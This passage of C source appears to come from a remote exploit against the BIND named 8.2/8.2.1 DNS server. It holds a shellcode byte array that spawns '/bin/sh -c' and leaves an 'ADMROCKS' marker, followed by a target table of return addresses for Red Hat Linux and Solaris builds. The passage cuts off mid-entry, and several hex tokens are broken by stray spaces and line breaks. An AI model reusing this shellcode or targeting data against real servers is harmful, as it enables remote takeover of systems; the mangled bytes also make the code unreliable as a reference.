0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74, 0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73, 0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75, 0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f, 0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b, 0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0 x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53, 0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f, 0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x 1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74 ,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52 ,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0 ,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2
9,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,
0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,
0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8, 0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x 2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xf
f,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62
,0x69,0x6e,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x 2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
/* One record per entry of archlist[]: a target description plus the
 * constants that go with it. */
struct arch
{
/* Numeric key; the archlist entries visible here are numbered from 1. */
int id;
/* Human-readable OS / named build description. */
char *name;
/* Points at one of the byte arrays defined above (linuxcode, sc, ...). */
char *code;
/* Initialised with sizeof() of that array in the visible entries. */
int codesize;
/* Address-sized constant; 0 in the Linux entries.  How it is used is not
 * visible in this part of the file. */
unsigned long safe;
/* Address-sized constant, different for each entry.  How it is used is not
 * visible in this part of the file. */
unsigned long ret;
/* 6500 or 11000 in the visible entries; presumably a size - TODO confirm. */
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode,
sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode,
sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738,
0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0,
11000},
{5, "Free